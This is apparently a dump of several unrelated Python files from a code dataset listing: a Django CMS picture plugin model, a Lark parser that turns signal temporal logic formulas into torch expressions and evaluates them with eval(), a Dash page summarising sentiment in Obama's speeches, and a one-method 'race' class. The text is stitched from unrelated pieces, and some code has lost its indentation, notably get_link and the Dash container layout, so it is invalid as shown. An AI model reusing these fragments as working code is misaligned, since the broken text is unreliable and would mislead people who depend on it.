        upscale = self.use_upscale
        # use field thumbnail settings
        if self.thumbnail_options:
            width = self.thumbnail_options.width
            height = self.thumbnail_options.height
            crop = self.thumbnail_options.crop
            upscale = self.thumbnail_options.upscale
        elif not self.use_automatic_scaling:
            width = self.width
            height = self.height

        # calculate height when not given according to the
        # golden ratio or fallback to the picture size
        if not height and width:
            height = int(width / PICTURE_RATIO)
        elif not width and height:
            width = int(height * PICTURE_RATIO)
        elif not width and not height and self.picture:
            width = self.picture.width
            height = self.picture.height

        options = {
            'size': (width, height),
            'crop': crop,
            'upscale': upscale,
        }
        return options
def get_link(self):
if self.link_url:
return self.link_url
elif self.link_page_id:
return self.link_page.get_absolute_url(language=self.language)
elif self.external_picture:
return self.external_picture
return False
def clean(self):
    """Validate mutually exclusive link, image-source and cropping options.

    :raises ValidationError: when both link kinds are set, when no image
        source is configured, or when incompatible cropping options are
        combined.
    """
    # there can be only one link type
    if self.link_url and self.link_page_id:
        raise ValidationError(
            gettext(
                'You have given both external and internal links. '
                'Only one option is allowed.'
            )
        )
    # you shall only set one image kind
    if not (self.picture or self.external_picture):
        raise ValidationError(
            gettext(
                'You need to add either an image, '
                'or a URL linking to an external image.'
            )
        )
    # certain cropping options do not work together; the first pair of
    # options that are both enabled triggers the validation error below
    invalid_option_pairs = (
        ('use_automatic_scaling', 'use_no_cropping'),
        ('use_automatic_scaling', 'thumbnail_options'),
        ('use_no_cropping', 'use_crop'),
        ('use_no_cropping', 'use_upscale'),
        ('use_no_cropping', 'thumbnail_options'),
        ('thumbnail_options', 'use_crop'),
        ('thumbnail_options', 'use_upscale'),
    )
    offending = next(
        (
            pair
            for pair in invalid_option_pairs
            if getattr(self, pair[0]) and getattr(self, pair[1])
        ),
        None,
    )
    if offending:
        message = gettext(
            'Invalid cropping settings. '
            'You cannot combine "{field_a}" with "{field_b}".'
        )
        raise ValidationError(message.format(
            field_a=self._meta.get_field(offending[0]).verbose_name,
            field_b=self._meta.get_field(offending[1]).verbose_name,
        ))
@property
def is_responsive_image(self):
    """Whether a responsive ``<img>`` should be rendered for this plugin.

    External pictures never get responsive variants; 'inherit' defers
    to the ``DJANGOCMS_PICTURE_RESPONSIVE_IMAGES`` setting.
    """
    if self.external_picture:
        return False
    choice = self.use_responsive_image
    if choice == 'inherit':
        return getattr(settings, 'DJANGOCMS_PICTURE_RESPONSIVE_IMAGES', False)
    return choice == 'yes'
@property
def img_srcset_data(self):
    """Build ``(width, thumbnail)`` pairs for a responsive ``srcset``.

    Returns ``None`` unless a filer picture is set and responsive images
    are enabled; otherwise one square-bounded thumbnail per configured
    viewport breakpoint narrower than the target rendering width.
    """
    if not (self.picture and self.is_responsive_image):
        return None
    srcset = []
    thumbnailer = get_thumbnailer(self.picture)
    picture_options = self.get_size(self.width, self.height)
    picture_width = picture_options['size'][0]
    thumbnail_options = {'crop': picture_options['crop']}
    # project-level override of the default breakpoint widths
    breakpoints = getattr(
        settings,
        'DJANGOCMS_PICTURE_RESPONSIVE_IMAGES_VIEWPORT_BREAKPOINTS',
        [576, 768, 992],
    )
    # only generate variants smaller than the full rendering width;
    # the shared options dict is mutated per iteration on purpose
    for size in filter(lambda x: x < picture_width, breakpoints):
        thumbnail_options['size'] = (size, size)
        srcset.append((int(size), thumbnailer.get_thumbnail(thumbnail_options)))
    return srcset
@property
def img_src(self):
    """URL of the image to render, or ``''`` when no image is configured."""
    # we want the external picture to take priority by design
    # please open a ticket if you disagree for an open discussion
    if self.external_picture:
        return self.external_picture
    # picture can be empty, for example when the image is removed from filer
    # in this case we want to return an empty string to avoid #69
    if not self.picture:
        return ''
    # return the original, unmodified picture
    if self.use_no_cropping:
        return self.picture.url
    size_options = self.get_size(
        width=self.width or 0,
        height=self.height or 0,
    )
    thumbnail = get_thumbnailer(self.picture).get_thumbnail({
        'size': size_options['size'],
        'crop': size_options['crop'],
        'upscale': size_options['upscale'],
        'subject_location': self.picture.subject_location,
    })
    return thumbnail.url
class Picture(AbstractPicture):
    """Concrete picture plugin model: the non-abstract variant of the base."""
    class Meta:
        abstract = False
|
python
|
import lark
import copy
import torch
class LogicParser:
    """ This class defines the grammar of the STL according to
    the EBNF syntax and builds the AST accordingly.
    """
    # Lark EBNF grammar: atoms compare a variable against a constant or
    # another variable; propositions combine via !, & and |; the LTL
    # operators F (finally) and G (globally) wrap a proposition.
    _grammar = """
    start: prop
    prop: VAR CMP (CONST | VAR) -> atom
        | _NOT "(" prop ")" -> op_not
        | (prop _OR)+ prop -> op_or
        | (prop _AND)+ prop -> op_and
        | ltl_op "(" prop ")" -> operator
    ltl_op: letter
    letter: LTL_OPERATOR
    _NOT: "!"
    _AND: "&"
    _OR: "|"
    LTL_OPERATOR : ("F" | "G")
    CMP: ("<=" | "<" | ">=" | ">" | "!=" | "==")
    VAR: /[a-z_]+/
    CONST: SIGNED_NUMBER
    %import common.INT
    %import common.DECIMAL
    %import common.SIGNED_NUMBER
    %import common.WORD
    %import common.WS
    %ignore WS
    """

    def __init__(self, formula):
        """Parse *formula* (an STL string) into an AST.

        :param formula: the textual STL formula
        :raises lark.exceptions.LarkError: when the formula is malformed
        """
        parser = lark.Lark(self._grammar)
        self._tree = parser.parse(formula)

    @property
    def parse_tree(self):
        """A deep copy of the AST, safe for destructive transformation."""
        return copy.deepcopy(self._tree)

    def __str__(self):
        # pretty-printed AST, mainly for debugging
        return self._tree.pretty()
class Functions:
    """ Encapsulate the set of functions allowed to be called
    from the formula built starting from the AST.

    Each function implements one connective of the quantitative
    (robustness) semantics over torch tensors: negation flips the
    sign, conjunction/disjunction use elementwise min/max, and the
    temporal operators F/G reduce over the whole signal.
    """

    @staticmethod
    def not_(x):
        """Robustness of ``!p``: the negated robustness of ``p``."""
        return -x

    @staticmethod
    def and_(a, b):
        """Robustness of ``p & q``: the elementwise minimum."""
        return torch.min(a, b)

    @staticmethod
    def or_(a, b):
        """Robustness of ``p | q``: the elementwise maximum."""
        return torch.max(a, b)

    @staticmethod
    def finally_(f):
        """Robustness of ``F(p)``: the maximum over the trace."""
        return torch.max(f)

    @staticmethod
    def globally_(f):
        """Robustness of ``G(p)``: the minimum over the trace."""
        return torch.min(f)
@lark.v_args(inline=True)
class _CodeBuilder(lark.Transformer):
    """ Set of rules to traverse the AST and build a customized formula.
    Basically it rewrites a formula starting from the AST to have
    fine control on the operations that will be carried out by the
    specific semantic.
    """

    def atom(self, *args):
        """Rewrite an atomic comparison ``a CMP b`` as a signed difference
        whose value is >= 0 exactly when the atom holds (robustness)."""
        operand_a, operator, operand_b = args
        if operator == '>=':
            return f'{operand_a} - {operand_b}'
        elif operator == '>':
            raise NotImplementedError
        elif operator == '<=':
            return f'{operand_b} - {operand_a}'
        elif operator == '<':
            raise NotImplementedError
        # BUG FIX: the original condition was ``operator == '==' or '!='``,
        # whose right operand is the always-truthy literal '!=' rather
        # than a comparison against it.
        elif operator in ('==', '!='):
            raise NotImplementedError

    def op_not(self, preposition):
        """Wrap a proposition in the negation primitive."""
        return 'fn.not_(' + preposition + ')'

    def op_and(self, preposition_a, preposition_b):
        """Combine two propositions with the conjunction primitive."""
        args = [preposition_a, preposition_b]
        return 'fn.and_(' + ', '.join(args) + ')'

    def op_or(self, preposition_a, preposition_b):
        """Combine two propositions with the disjunction primitive."""
        args = [preposition_a, preposition_b]
        return 'fn.or_(' + ', '.join(args) + ')'

    def ltl_op(self, *parameters):
        """Collect the operator letters ('F'/'G') of an ``ltl_op`` node."""
        return list(map(lambda x: str(x.children[0]), parameters))

    def operator(self, params, preposition):
        """Apply a single temporal operator to a rewritten proposition.

        :raises NotImplementedError: for multiple letters or an
            unrecognized letter
        """
        if len(params) > 1:
            raise NotImplementedError
        letter = params[0]
        operator_args = [preposition]
        if letter == 'F':
            function = 'fn.finally_'
        elif letter == 'G':
            function = 'fn.globally_'
        else:
            # guard: previously an unrecognized letter left `function`
            # unbound and raised a confusing NameError instead
            raise NotImplementedError
        return function + '(' + ', '.join(operator_args) + ')'

    def start(self, preposition):
        """Return the final generated expression as a plain string."""
        return str(preposition)
class DiffQuantitativeSemantic:
    """ This class is used as API to build an STL formula and apply
    it to arbitrary signals according to the quantitative semantics.
    """

    def __init__(self, logic_formula):
        """Get the parse-tree and call the method _build on it.

        :param logic_formula: an STL formula string, or an object that
            already exposes ``parse_tree`` (presumably a ``LogicParser``
            — TODO confirm with callers)
        """
        if isinstance(logic_formula, str):
            self.logic_parser = LogicParser(logic_formula)
        else:
            self.logic_parser = logic_formula
        self._code = self._build()

    def _build(self):
        """Compute the internal representation for the semantic."""
        tree = self.logic_parser.parse_tree
        code = _CodeBuilder().transform(tree)
        return code

    def compute(self, **signals):
        """Evaluate the formula's robustness over the given named signals.

        Each keyword argument becomes a variable visible to the
        generated expression; ``fn`` is bound to :class:`Functions`.
        """
        environment = {
            'fn': Functions,
        }
        environment.update(signals)
        # SECURITY NOTE(review): the generated code is passed to eval();
        # formulas must come from trusted sources only.
        return eval(self._code, environment)

    def __str__(self):
        # the generated source, useful for inspection/debugging
        return self._code
|
python
|
from dash import Input, Output, callback
from dash import dcc
import dash.html as html
import dash_bootstrap_components as dbc
from pages.constants import TITLE_STYLE, PARAGRAPH_STYLE, IMG_STYLE
from utils.topic_crud import TopicCRUD
import plotly.express as px
# Demo figure shown in the first accordion section.
df = px.data.iris()  # iris is a pandas DataFrame
fig = px.scatter(df, x="sepal_width", y="sepal_length")
# NOTE(review): instantiated but unused in this module — presumably the
# callbacks that fill the graphs below live elsewhere; verify before removing.
topic_plotter = TopicCRUD()
# Accordion section bodies: each is a list of Dash components.
item_1 = [
    "This is the content of the first section",
    dcc.Graph(figure=fig)
]
# Secondary topic: slider-driven figure (filled by a callback elsewhere).
topic_2_accordion = [
    'This is the topics for the accordion',
    html.Div([
        dcc.Slider(min=1, max=25, step=1,
                   id='second-topic-slider',
                   value=10,
                   tooltip={"placement": "bottom", "always_visible": True}
                   )]),
    dcc.Graph(id='second-topic-figure')
]
topics_by_city_accordion = [
    'This is the topics for the accordion',
    dcc.Graph(id='topic-cities-figure')
]
# NOTE(review): defined but never referenced by the accordion below —
# confirm whether the "topic presence" section was dropped on purpose.
topic_presence_accordion = [
    'This is the topics for the accordion',
    dcc.Graph(id='topic-presence-figure')
]
topic_word_relevance = [
    'This is the topics for the accordion',
    dcc.Input(id='word-presence-input'),
    dcc.Graph(id='topic-words-figure')
]
topic_speech_topics = [
    'This is the topics for the accordion',
    dcc.Dropdown(),
    dcc.Graph(id='topic-speeches-figure')
]
# Collapsible sections for the per-topic figures defined above.
accordion = dbc.Accordion(
    [
        dbc.AccordionItem(
            item_1, title="Topic - Key words"
        ),
        dbc.AccordionItem(
            topic_2_accordion, title="Secondary topic"
        ),
        dbc.AccordionItem(
            topics_by_city_accordion, title="Topic location"
        ),
        dbc.AccordionItem(
            topic_word_relevance, title="Word relevance"
        ),
        dbc.AccordionItem(
            # typo fix in the user-facing title: "speach" -> "speech"
            topic_speech_topics, title="Important topics by speech"
        ),
    ],
    start_collapsed=True,
    always_open=True,
    flush=True
)
body = dbc.Container([
# Title page
dbc.Row(
[
html.H1(
'Conclusions', style=TITLE_STYLE)
],
justify='center',
align='center',
),
# Image of obama,
dbc.Row(
[
dbc.Col(
[
html.Img(
src='assets/obama-farewell.jpg',
style=IMG_STYLE
),
dcc.Markdown('''_President Obama Caps Long Goodbye With Farewell Speech
Copyright: Copyright 2017 The Associated Press. All rights reserved._
''', style=TITLE_STYLE)
],
align='center',
)
],
align='center'
),
# Contains
dbc.Row(
[
dcc.Markdown('''
What are the variables of Obama\'s speeches? Our answers based on the analyses are:
- Obama tends to be more negative when he talks about foreign conflict and terrorism, gun violence, the economy, immigration, and civil rights.
- Obama tends to be more positive when he talks about elections, education, faith and family.
- The overall mean for the sentiment is more positive (0.1).
- All topics have a positive sentiment, the "more negative" topics are below the overall average, but their mean sentiment score is positive.
- Obama's job (dis)approval tracker does not have an impact on the sentiment of his speeches. But more dynamics in the tracker coincides with his 2nd presidential term (2013-2017).
- Gun deaths by assault has a negative effect on the sentiment of his speeches. More deaths associate with more negative sentiments in the speeches.
- The positively improving people's perception of the financial situation and job market in the US coincides with Obama's increasingly positive speeches related to economy.
'''),
],
justify='center',
align='center',
),
# dbc.Row(
# accordion
# )
], style={'height': '100%'})
layout = html.Div([
body
])
|
python
|
#!/usr/bin/python
class race:
    """Minimal record of a race, identified by its title.

    The lowercase class name and the ``titleReturn`` accessor are kept
    for backward compatibility with existing callers.
    """

    def __init__(self, t):
        """Store the race title.

        :param t: the race title
        """
        self.title = t

    def __repr__(self):
        # debug-friendly representation
        return f'{type(self).__name__}(title={self.title!r})'

    # ACCESSORS
    def titleReturn(self):
        """Return the stored title (prefer reading ``self.title`` directly)."""
        return self.title
|
python
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.